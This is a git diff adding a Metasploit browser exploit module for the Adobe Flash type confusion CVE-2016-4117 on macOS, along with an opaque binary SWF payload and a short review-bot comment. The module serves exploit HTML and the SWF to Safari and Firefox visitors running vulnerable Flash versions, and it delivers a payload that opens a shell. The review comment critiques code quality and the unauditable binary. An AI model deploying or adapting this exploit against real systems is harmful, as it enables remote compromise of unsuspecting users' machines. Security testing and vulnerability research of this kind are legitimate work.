diff --git a/data/exploits/CVE-2016-4117/msf.swf b/data/exploits/CVE-2016-4117/msf.swf
new file mode 100755
index 0000000000..f7a99357b2
Binary files /dev/null and b/data/exploits/CVE-2016-4117/msf.swf differ
diff --git a/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb b/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb
new file mode 100755
index 0000000000..0da166b0e6
--- /dev/null
+++ b/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',
+ 'Description' => %q{
+ This module exploits a type confusion on Adobe Flash Player. The vulnerability,
+ discovered in the wild. This module has been tested successfully on:
+ macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182,
+ Firefox and Adobe Flash Player 21.0.0.182.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'bcook-r7', # Imported Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2016-4117'],
+ ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117'],
+ ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'SessionTypes' => ['shell'],
+ 'Platform' => ['osx'],
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :os_name => lambda do |os|
+ os =~ OperatingSystems::Match::MAC_OSX
+ end,
+ :ua_name => lambda do |ua|
+ case target.name
+ when 'Mac OS X'
+ return true if ua == Msf::HttpClients::SAFARI
+ return true if ua == Msf::HttpClients::FF
+ end
+
+ false
+ end,
+ :flash => lambda do |ver|
+ case target.name
+ when 'Mac OS X'
+ return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')
+ end
+
+ false
+ end
+ },
+ 'Targets' =>
+ [
+ [ 'Mac OS X',
+ {
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X64,
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 27 2016',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ @swf = create_swf
+
+ super
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status('Sending SWF...')
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+ return
+ end
+
+ print_status('Sending HTML...')
+ send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+ end
+
+ def exploit_template(cli, target_info)
+ swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+ target_payload = get_payload(cli, target_info)
+ b64_payload = Rex::Text.encode_base64(target_payload)
+
+ if target.name =~ /osx/
+ platform_id = 'osx'
+ end
+ html_template = %Q|
+
+
+
+
+
+
+
+
+
+
+ |
+
+ return html_template, binding()
+ end
+
+ def create_swf
+ path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')
+ swf = ::File.open(path, 'rb') { |f| swf = f.read }
+
+ swf
+ end
+end
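Review bot: `create_swf` loads `data/exploits/CVE-2016-4117/msf.swf`, which this commit adds as an opaque binary with no source or build notes anywhere in the diff, so the file cannot be audited against what the module says it serves. I would ask for the source and build steps to be committed alongside it, or at least referenced in a comment above `create_swf` such as `# msf.swf is built from <path-to-source>; see <build-notes>`, and for `'Author'` to credit the origin of the SWF rather than only the importer. Separately, the method assigns `swf` twice in `swf = ::File.open(path, 'rb') { |f| swf = f.read }`; `::File.binread(path)` performs the same read in one call. The second sentence of `'Description'` ("The vulnerability, discovered in the wild.") is a fragment and should be completed.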